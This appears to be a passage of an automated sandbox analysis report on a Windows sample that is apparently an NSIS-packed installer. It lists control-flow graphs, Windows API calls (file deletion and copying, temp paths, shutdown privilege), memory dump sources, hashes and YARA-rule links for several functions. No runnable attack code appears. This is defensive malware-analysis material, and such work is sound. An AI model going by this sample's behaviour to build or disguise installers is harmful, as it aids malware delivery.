                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 2 339434e0-339434ec LdrInitializeThunk
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 02e2e3d51df58487f47db9c22e73f88f8a138610c827dd7715e20bab82ec4415
                                                                                                                                                                                                                                                                • Instruction ID: 1eccc406df364fc80c7af18456abf9df18385d4f1cee6d238a8ed469ef73d0ad
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02e2e3d51df58487f47db9c22e73f88f8a138610c827dd7715e20bab82ec4415
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7090023170920C52E500A1584614706101587D0202F61C856B1514528DC7A9899576A2
                                                                                                                                                                                                                                                                Function 33942B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 0 33942b90-33942b9c LdrInitializeThunk
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: ae96d21c93202e16742164c353ce1c0b568b11109ccda1b404fadb4928f42b80
                                                                                                                                                                                                                                                                • Instruction ID: 3f8cf41b152214503a61d1cf518b0ba9f5093dc500d3306c86320b39ac58a57a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae96d21c93202e16742164c353ce1c0b568b11109ccda1b404fadb4928f42b80
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9590023130518C52E510A158850474A001587D0302F55C856B5514618DC6A988D57221
                                                                                                                                                                                                                                                                Function 33942D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1 33942d10-33942d1c LdrInitializeThunk
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 697451a6f1d0fa452d675d94cf839b84e2f355252e16ce9db03d596cbc38bddb
                                                                                                                                                                                                                                                                • Instruction ID: 2bac0022837a3d4f79421dde20c312b765c283696bd67af1365a6cada98572d0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 697451a6f1d0fa452d675d94cf839b84e2f355252e16ce9db03d596cbc38bddb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B190023130510C63E511A1584604707001987D0242F91C857B1514518DD66A8996B221

                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                Function 004047F9 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 3 4047f9-404845 GetDlgItem * 2 4 404a65-404a6c 3->4 5 40484b-4048df GlobalAlloc LoadBitmapA SetWindowLongA ImageList_Create ImageList_AddMasked SendMessageA * 2 3->5 6 404a80 4->6 7 404a6e-404a7e 4->7 8 4048e1-4048ec SendMessageA 5->8 9 4048ee-4048f5 DeleteObject 5->9 10 404a83-404a8c 6->10 7->10 8->9 11 4048f7-4048ff 9->11 12 404a97-404a9d 10->12 13 404a8e-404a91 10->13 14 404901-404904 11->14 15 404928-40492c 11->15 19 404aac-404ab3 12->19 20 404a9f-404aa6 12->20 13->12 16 404b7b-404b82 13->16 17 404906 14->17 18 404909-404926 call 405bb3 SendMessageA * 2 14->18 15->11 21 40492e-40495a call 403e7f * 2 15->21 23 404bf3-404bfb 16->23 24 404b84-404b8a 16->24 17->18 18->15 26 404ab5-404ab8 19->26 27 404b28-404b2b 19->27 20->16 20->19 59 404960-404966 21->59 60 404a24-404a37 GetWindowLongA SetWindowLongA 21->60 32 404c05-404c0c 23->32 33 404bfd-404c03 SendMessageA 23->33 29 404b90-404b9a 24->29 30 404ddb-404ded call 403ee6 24->30 35 404ac3-404ad8 call 404747 26->35 36 404aba-404ac1 26->36 27->16 31 404b2d-404b37 27->31 29->30 39 404ba0-404baf SendMessageA 29->39 41 404b47-404b51 31->41 42 404b39-404b45 SendMessageA 31->42 43 404c40-404c47 32->43 44 404c0e-404c15 32->44 33->32 35->27 58 404ada-404aeb 35->58 36->27 36->35 39->30 51 404bb5-404bc6 SendMessageA 39->51 41->16 53 404b53-404b5d 41->53 42->41 49 404d9d-404da4 43->49 50 404c4d-404c59 call 4011ef 43->50 45 404c17-404c18 ImageList_Destroy 44->45 46 404c1e-404c25 44->46 45->46 56 404c27-404c28 GlobalFree 46->56 57 404c2e-404c3a 46->57 49->30 64 404da6-404dad 49->64 75 404c69-404c6c 50->75 76 404c5b-404c5e 50->76 62 404bd0-404bd2 51->62 63 404bc8-404bce 51->63 54 404b6e-404b78 53->54 55 404b5f-404b6c 53->55 54->16 55->16 56->57 57->43 58->27 65 404aed-404aef 58->65 66 404969-40496f 59->66 70 404a3d-404a41 60->70 68 404bd3-404bec call 401299 SendMessageA 62->68 63->62 63->68 64->30 69 404daf-404dd9 ShowWindow GetDlgItem ShowWindow 64->69 71 404af1-404af8 65->71 72 404b02 65->72 73 404a05-404a18 66->73 74 404975-40499d 66->74 68->23 69->30 78 404a43-404a56 ShowWindow call 403eb4 70->78 79 404a5b-404a63 call 403eb4 70->79 82 404afa-404afc 71->82 83 404afe-404b00 71->83 86 404b05-404b21 call 40117d 72->86 73->66 90 404a1e-404a22 73->90 84 4049d7-4049d9 74->84 85 40499f-4049d5 SendMessageA 74->85 91 404cad-404cd1 call 4011ef 75->91 92 404c6e-404c87 call 4012e2 call 401299 75->92 87 404c60 76->87 88 404c61-404c64 call 4047c7 76->88 78->30 79->4 82->86 83->86 93 4049db-4049ea SendMessageA 84->93 94 4049ec-404a02 SendMessageA 84->94 85->73 86->27 87->88 88->75 90->60 90->70 105 404d73-404d87 InvalidateRect 91->105 106 404cd7 91->106 111 404c97-404ca6 SendMessageA 92->111 112 404c89-404c8f 92->112 93->73 94->73 105->49 108 404d89-404d98 call 40471a call 404665 105->108 109 404cda-404ce5 106->109 108->49 113 404ce7-404cf6 109->113 114 404d5b-404d6d 109->114 111->91 115 404c91 112->115 116 404c92-404c95 112->116 118 404cf8-404d05 113->118 119 404d09-404d0c 113->119 114->105 114->109 115->116 116->111 116->112 118->119 121 404d13-404d1c 119->121 122 404d0e-404d11 119->122 123 404d21-404d59 SendMessageA * 2 121->123 124 404d1e 121->124 122->123 123->114 124->123
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404811
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 0040481C
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404866
                                                                                                                                                                                                                                                                • LoadBitmapA.USER32(0000006E), ref: 00404879
                                                                                                                                                                                                                                                                • SetWindowLongA.USER32(?,000000FC,00404DF0), ref: 00404892
                                                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048A6
                                                                                                                                                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004048B8
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001109,00000002), ref: 004048CE
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048DA
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048EC
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004048EF
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040491A
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404926
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049BB
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049E6
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049FA
                                                                                                                                                                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 00404A29
                                                                                                                                                                                                                                                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A37
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404A48
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B45
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BAA
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BBF
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BE3
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C03
                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404C18
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00404C28
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CA1
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001102,?,?), ref: 00404D4A
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D59
                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D79
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00404DC7
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00404DD2
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00404DD9
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                • String ID: $M$N
                                                                                                                                                                                                                                                                • API String ID: 1638840714-813528018
                                                                                                                                                                                                                                                                • Opcode ID: ec91b3c05056c8a31251e6ec194b5f81d354e456f94ac355a5bd5cd62dfa5eea
                                                                                                                                                                                                                                                                • Instruction ID: 85f2183cf6d0466de3af39f406c7ee36f40fbb46029595ad20bc80e91715a9ea
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec91b3c05056c8a31251e6ec194b5f81d354e456f94ac355a5bd5cd62dfa5eea
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B0281B0A00209AFEB20DF55DD85AAE7BB5FB84315F14817AF610B62E1C7789D42CF58
                                                                                                                                                                                                                                                                Function 004030E2 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 324stringfilecomCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 125 4030e2-403179 #17 SetErrorMode OleInitialize call 405ebc SHGetFileInfoA call 405b91 GetCommandLineA call 405b91 GetModuleHandleA 132 403185-40319a call 40564c CharNextA 125->132 133 40317b-403180 125->133 136 40325f-403263 132->136 133->132 137 403269 136->137 138 40319f-4031a2 136->138 141 40327c-403296 GetTempPathA call 4030ae 137->141 139 4031a4-4031a8 138->139 140 4031aa-4031b2 138->140 139->139 139->140 142 4031b4-4031b5 140->142 143 4031ba-4031bd 140->143 151 403298-4032b6 GetWindowsDirectoryA lstrcatA call 4030ae 141->151 152 4032ee-403308 DeleteFileA call 402c29 141->152 142->143 145 4031c3-4031c7 143->145 146 40324f-40325c call 40564c 143->146 149 4031c9-4031cf 145->149 150 4031df-40320c 145->150 146->136 161 40325e 146->161 155 4031d1-4031d3 149->155 156 4031d5 149->156 157 40320e-403214 150->157 158 40321f-40324d 150->158 151->152 166 4032b8-4032e8 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030ae 151->166 167 40339c-4033ab call 403540 OleUninitialize 152->167 168 40330e-403314 152->168 155->150 155->156 156->150 163 403216-403218 157->163 164 40321a 157->164 158->146 160 40326b-403277 call 405b91 158->160 160->141 161->136 163->158 163->164 164->158 166->152 166->167 180 4033b1-4033c1 call 4053a5 ExitProcess 167->180 181 4034a5-4034ab 167->181 171 403316-403321 call 40564c 168->171 172 40338c-403398 call 40361a 168->172 184 403323-40334c 171->184 185 403357-403361 171->185 172->167 182 403528-403530 181->182 183 4034ad-4034ca call 405ebc * 3 181->183 188 403532 182->188 189 403536-40353a ExitProcess 182->189 214 403514-40351f ExitWindowsEx 183->214 215 4034cc-4034ce 183->215 190 40334e-403350 184->190 191 403363-403370 call 40570f 185->191 192 4033c7-4033e1 lstrcatA lstrcmpiA 185->192 188->189 190->185 196 403352-403355 190->196 191->167 202 403372-403388 call 405b91 * 2 191->202 192->167 194 4033e3-4033f8 CreateDirectoryA SetCurrentDirectoryA 192->194 199 403405-40342d call 405b91 194->199 200 4033fa-403400 call 405b91 194->200 196->185 196->190 210 403433-40344f call 405bb3 DeleteFileA 199->210 200->199 202->172 221 403490-403497 210->221 222 403451-403461 CopyFileA 210->222 214->182 218 403521-403523 call 40140b 214->218 215->214 219 4034d0-4034d2 215->219 218->182 219->214 220 4034d4-4034e6 GetCurrentProcess 219->220 220->214 229 4034e8-40350a 220->229 221->210 224 403499-4034a0 call 405a45 221->224 222->221 225 403463-403483 call 405a45 call 405bb3 call 405344 222->225 224->167 225->221 237 403485-40348c CloseHandle 225->237 229->214 237->221
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • #17.COMCTL32 ref: 00403103
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00008001), ref: 0040310E
                                                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 00403115
                                                                                                                                                                                                                                                                  • Part of subcall function 00405EBC: GetModuleHandleA.KERNEL32(?,?,?,00403127,00000008), ref: 00405ECE
                                                                                                                                                                                                                                                                  • Part of subcall function 00405EBC: LoadLibraryA.KERNEL32(?,?,?,00403127,00000008), ref: 00405ED9
                                                                                                                                                                                                                                                                  • Part of subcall function 00405EBC: GetProcAddress.KERNEL32(00000000,?), ref: 00405EEA
                                                                                                                                                                                                                                                                • SHGetFileInfoA.SHELL32(004287E0,00000000,?,00000160,00000000,00000008), ref: 0040313D
                                                                                                                                                                                                                                                                  • Part of subcall function 00405B91: lstrcpynA.KERNEL32(?,?,00000400,00403152,0042DBA0,NSIS Error), ref: 00405B9E
                                                                                                                                                                                                                                                                • GetCommandLineA.KERNEL32(0042DBA0,NSIS Error), ref: 00403152
                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00434000,00000000), ref: 00403165
                                                                                                                                                                                                                                                                • CharNextA.USER32(00000000,00434000,00000020), ref: 00403190
                                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000400,00435400,00000000,00000020), ref: 0040328D
                                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(00435400,000003FB), ref: 0040329E
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00435400,\Temp), ref: 004032AA
                                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(000003FC,00435400,00435400,\Temp), ref: 004032BE
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00435400,Low), ref: 004032C6
                                                                                                                                                                                                                                                                • SetEnvironmentVariableA.KERNEL32(TEMP,00435400,00435400,Low), ref: 004032D7
                                                                                                                                                                                                                                                                • SetEnvironmentVariableA.KERNEL32(TMP,00435400), ref: 004032DF
                                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(00435000), ref: 004032F3
                                                                                                                                                                                                                                                                • OleUninitialize.OLE32(?), ref: 004033A1
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 004033C1
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00435400,~nsu.tmp,00434000,00000000,?), ref: 004033CD
                                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(00435400,00434C00), ref: 004033D9
                                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(00435400,00000000), ref: 004033E5
                                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(00435400), ref: 004033EC
                                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(004283E0,004283E0,?,0042F000,?), ref: 00403445
                                                                                                                                                                                                                                                                • CopyFileA.KERNEL32(00435C00,004283E0,00000001), ref: 00403459
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,004283E0,004283E0,?,004283E0,00000000), ref: 00403486
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004034DB
                                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403517
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0040353A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                • String ID: "$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                • API String ID: 4107622049-1245305578
                                                                                                                                                                                                                                                                • Opcode ID: 5582cf7e80513128dcd25e4139f5933d1710ea380e8354cb828c356b10781b78
                                                                                                                                                                                                                                                                • Instruction ID: ab5bd0cb9fd354075505a922324eb5159d0c68426fb539e9448df04d541e8703
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5582cf7e80513128dcd25e4139f5933d1710ea380e8354cb828c356b10781b78
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FB105706082416AE7216F659D8DA2B7EA8AB45306F04047FF581B62E3C77C9E05CB6E
                                                                                                                                                                                                                                                                Function 339A9060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1100 339a9060-339a90a9 1101 339a90ab-339a90b0 1100->1101 1102 339a90f8-339a9107 1100->1102 1103 339a90b4-339a90ba 1101->1103 1102->1103 1104 339a9109-339a910e 1102->1104 1105 339a90c0-339a90e4 call 33948f40 1103->1105 1106 339a9215-339a923d call 33948f40 1103->1106 1107 339a9893-339a98a7 call 33944b50 1104->1107 1114 339a9113-339a91b4 GetPEB call 339ad7e5 1105->1114 1115 339a90e6-339a90f3 call 339c92ab 1105->1115 1116 339a923f-339a925a call 339a98aa 1106->1116 1117 339a925c-339a9292 1106->1117 1127 339a91d2-339a91e7 1114->1127 1128 339a91b6-339a91c4 1114->1128 1126 339a91fd-339a9210 RtlDebugPrintTimes 1115->1126 1121 339a9294-339a9296 1116->1121 1117->1121 1121->1107 1122 339a929c-339a92b1 RtlDebugPrintTimes 1121->1122 1122->1107 1132 339a92b7-339a92be 1122->1132 1126->1107 1127->1126 1131 339a91e9-339a91ee 1127->1131 1128->1127 1129 339a91c6-339a91cb 1128->1129 1129->1127 1133 339a91f3-339a91f6 1131->1133 1134 339a91f0 1131->1134 1132->1107 1136 339a92c4-339a92df 1132->1136 1133->1126 1134->1133 1137 339a92e3-339a92f4 call 339aa388 1136->1137 1140 339a92fa-339a92fc 1137->1140 1141 339a9891 1137->1141 1140->1107 1142 339a9302-339a9309 1140->1142 1141->1107 1143 339a930f-339a9314 1142->1143 1144 339a947c-339a9482 1142->1144 1147 339a933c 1143->1147 1148 339a9316-339a931c 1143->1148 1145 339a9488-339a94b7 call 33948f40 1144->1145 1146 339a961c-339a9622 1144->1146 1162 339a94b9-339a94c4 1145->1162 1163 339a94f0-339a9505 1145->1163 1151 339a9674-339a9679 1146->1151 1152 339a9624-339a962d 1146->1152 1149 339a9340-339a9391 call 33948f40 RtlDebugPrintTimes 1147->1149 1148->1147 1153 339a931e-339a9332 1148->1153 1149->1107 1189 339a9397-339a939b 1149->1189 1157 339a9728-339a9731 1151->1157 1158 339a967f-339a9687 1151->1158 1152->1137 1156 339a9633-339a966f call 33948f40 1152->1156 1159 339a9338-339a933a 1153->1159 1160 339a9334-339a9336 1153->1160 1181 339a9869 1156->1181 1157->1137 1164 339a9737-339a973a 1157->1164 1166 339a9689-339a968d 1158->1166 1167 339a9693-339a96bd call 339a8093 1158->1167 1159->1149 1160->1149 1168 339a94cf-339a94ee 1162->1168 1169 339a94c6-339a94cd 1162->1169 1173 339a9511-339a9518 1163->1173 1174 339a9507-339a9509 1163->1174 1170 339a97fd-339a9834 call 33948f40 1164->1170 1171 339a9740-339a978a 1164->1171 1166->1157 1166->1167 1186 339a9888-339a988c 1167->1186 1187 339a96c3-339a971e call 33948f40 RtlDebugPrintTimes 1167->1187 1180 339a9559-339a9576 RtlDebugPrintTimes 1168->1180 1169->1168 1198 339a983b-339a9842 1170->1198 1199 339a9836 1170->1199 1178 339a978c 1171->1178 1179 339a9791-339a979e 1171->1179 1184 339a953d-339a953f 1173->1184 1182 339a950b-339a950d 1174->1182 1183 339a950f 1174->1183 1178->1179 1192 339a97aa-339a97ad 1179->1192 1193 339a97a0-339a97a3 1179->1193 1180->1107 1214 339a957c-339a959f call 33948f40 1180->1214 1194 339a986d 1181->1194 1182->1173 1183->1173 1190 339a951a-339a9524 1184->1190 1191 339a9541-339a9557 1184->1191 1186->1137 1187->1107 1229 339a9724 1187->1229 1200 339a93eb-339a9400 1189->1200 1201 339a939d-339a93a5 1189->1201 1195 339a952d 1190->1195 1196 339a9526 1190->1196 1191->1180 1204 339a97b9-339a97fb 1192->1204 1205 339a97af-339a97b2 1192->1205 1193->1192 1203 339a9871-339a9886 RtlDebugPrintTimes 1194->1203 1208 339a952f-339a9531 1195->1208 1196->1191 1206 339a9528-339a952b 1196->1206 1209 339a984d 1198->1209 1210 339a9844-339a984b 1198->1210 1199->1198 1213 339a9406-339a9414 1200->1213 1211 339a93d2-339a93e9 1201->1211 1212 339a93a7-339a93d0 call 339a8093 1201->1212 1203->1107 1203->1186 1204->1203 1205->1204 1206->1208 1215 339a953b 1208->1215 1216 339a9533-339a9535 1208->1216 1217 339a9851-339a9857 1209->1217 1210->1217 1211->1213 1219 339a9418-339a946f call 33948f40 RtlDebugPrintTimes 1212->1219 1213->1219 1232 339a95bd-339a95d8 1214->1232 1233 339a95a1-339a95bb 1214->1233 1215->1184 1216->1215 1223 339a9537-339a9539 1216->1223 1224 339a9859-339a985c 1217->1224 1225 339a985e-339a9864 1217->1225 1219->1107 1236 339a9475-339a9477 1219->1236 1223->1184 1224->1181 1225->1194 1230 339a9866 1225->1230 1229->1157 1230->1181 1234 339a95dd-339a960b RtlDebugPrintTimes 1232->1234 1233->1234 1234->1107 1238 339a9611-339a9617 1234->1238 1236->1186 1238->1164
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: $ $0
                                                                                                                                                                                                                                                                • API String ID: 3446177414-3352262554
                                                                                                                                                                                                                                                                • Opcode ID: e46b65d035374d8afc62434a0851213842362b9b42483a04e3d20cf045652283
                                                                                                                                                                                                                                                                • Instruction ID: 9067d0cd40a08a6db5cc34e2557edb7a9369f5de4216f651537961c07ffd1441
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e46b65d035374d8afc62434a0851213842362b9b42483a04e3d20cf045652283
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A53205B5A08385CFE350CF68C484B5BBBE9BB88344F044A2EF99987351D775E948CB52
                                                                                                                                                                                                                                                                Function 00405451 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159filestringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?,?,00435400,756A3410,00000000), ref: 0040547A
